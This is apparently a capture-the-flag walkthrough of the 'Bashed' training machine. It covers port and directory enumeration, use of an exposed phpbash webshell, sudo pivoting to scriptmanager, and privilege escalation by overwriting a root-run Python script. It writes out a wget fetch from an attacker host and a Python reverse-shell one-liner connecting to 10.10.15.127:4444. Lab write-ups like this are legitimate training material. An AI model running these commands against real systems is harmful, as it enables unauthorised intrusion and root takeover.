Bashed
External Enumeration
Nmap
nmap -sV -sC -T4 10.129.45.115
┌─[parrot@parrot]─[~]
└──╼ $nmap -sV -sC -T4 10.129.45.115
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-24 15:05 EST
Nmap scan report for 10.129.45.115
Host is up (0.036s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.94 secondsOnly Port 80 Open, Checking -p- to be sure and UDP
nmap -p- 10.129.45.115 (Still only showing port 80)
nmap -sU 10.129.45.115 (No New Ports)HTTP (80)
Enumerating Directories
gobuster dir -u http://10.129.45.115 -w /usr/share/dirb/wordlists/common.txt
/.hta (Status: 403) [Size: 292]
/.htaccess (Status: 403) [Size: 297]
/.htpasswd (Status: 403) [Size: 297]
/css (Status: 301) [Size: 312] [--> http://10.129.45.115/css/]
/dev (Status: 301) [Size: 312] [--> http://10.129.45.115/dev/]
/fonts (Status: 301) [Size: 314] [--> http://10.129.45.115/fonts/]
/images (Status: 301) [Size: 315] [--> http://10.129.45.115/images/]
/index.html (Status: 200) [Size: 7743]
/js (Status: 301) [Size: 311] [--> http://10.129.45.115/js/]
/php (Status: 301) [Size: 312] [--> http://10.129.45.115/php/]
/server-status (Status: 403) [Size: 301]
/uploads (Status: 301) [Size: 316] [--> http://10.129.45.115/uploads/]Checking directories, /dev contains a webshell, phpbash.php
Submitting User Flag
cat /home/arrexel/user.txtEnumerating User Permissions
www-data@bashed:/home/arrexel# sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALLUser can run a script called scriptmanager with no password needed
Trying to run commands as scriptmanager
www-data@bashed:/# sudo -u scriptmanager whoami
scriptmanagerWe can run commands as script manager.
From checking / directory, scriptmanager probably has access to /scripts
www-data@bashed:/# sudo -u scriptmanager ls -la /scripts
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Jun 2 2022 .
drwxr-xr-x 23 root root 4096 Jun 2 2022 ..
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
-rw-r--r-- 1 root root 12 Dec 24 12:36 test.txtWe can read /scripts
Reading test.py and test.txt doesn’t provide anything.
Create Reverse Shell
Create shell.php & download to webshell
pyhon3 -m http.server
www-data@bashed:/var/www/html/uploads# wget http://10.10.15.127:8000/shell.phpStart Listener and go to file
nc -nvlp 4444
go to http://10.129.45.115/uploads/shell.phpreverse shell has been received
Stabilize Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl + z
stty raw -echo; fg
stty rows 38 columns 116Start Shell as ScriptManager
sudo -u scriptmanager /bin/bashCreate Revshell to run as Root in test.py
Create test.py and transfer
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.127",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])
wget http://10.10.15.127:8000/test.pySetup Listener to connect to root shell
nc -nvlp 4444Received Root Shell
cat /root/flag.txt